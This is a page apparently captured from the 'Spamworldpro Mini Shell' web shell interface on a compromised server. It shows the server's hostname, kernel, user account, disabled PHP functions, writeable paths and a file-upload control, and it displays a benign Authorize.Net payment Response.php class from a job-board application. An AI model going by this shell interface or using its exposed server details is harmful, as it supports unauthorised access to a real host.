Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/corals/job-board.corals.io/Corals/modules/Payment/AuthorizeNet/Message/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/corals/job-board.corals.io/Corals/modules/Payment/AuthorizeNet/Message/Response.php
<?php

namespace Corals\Modules\Payment\AuthorizeNet\Message;

use Corals\Modules\Payment\Common\Message\AbstractResponse;

/**
 * Response
 */
class Response extends AbstractResponse
{
    /**
     * The overall transaction result code.
     */
    const TRANSACTION_RESULT_CODE_APPROVED = 1;
    const TRANSACTION_RESULT_CODE_DECLINED = 2;
    const TRANSACTION_RESULT_CODE_ERROR = 3;
    const TRANSACTION_RESULT_CODE_REVIEW = 4;

    public function isSuccessful()
    {
        return $this->getResultCode() === static::TRANSACTION_RESULT_CODE_APPROVED;
    }

    /**
     * Overall status of the transaction. This field is also known as "Response Code" in Authorize.NET terminology.
     *
     * @return int 1 = Approved, 2 = Declined, 3 = Error, 4 = Held for Review
     */
    public function getResultCode()
    {

        $result = $this->data->getMessages()->getResultCode();

        switch ($result) {
            case 'Ok':
                return static::TRANSACTION_RESULT_CODE_APPROVED;
            case 'Error':
                return static::TRANSACTION_RESULT_CODE_ERROR;
            default:
                return null;

        }
    }

    /**
     * Text description of the status.
     *
     * @return string|null
     */
    public function getMessage()
    {
        $message = null;


        if ($this->data->getMessages()->getMessage()[0]) {
            $message = (string)$this->data->getMessages()->getMessage()[0]->getText();

        }

        return $message;
    }

    /**
     * @return string
     */
    public function getCurrentPeriodEndReference()
    {
        return \Carbon\Carbon::now()->timestamp;

    }


}

Spamworldpro Mini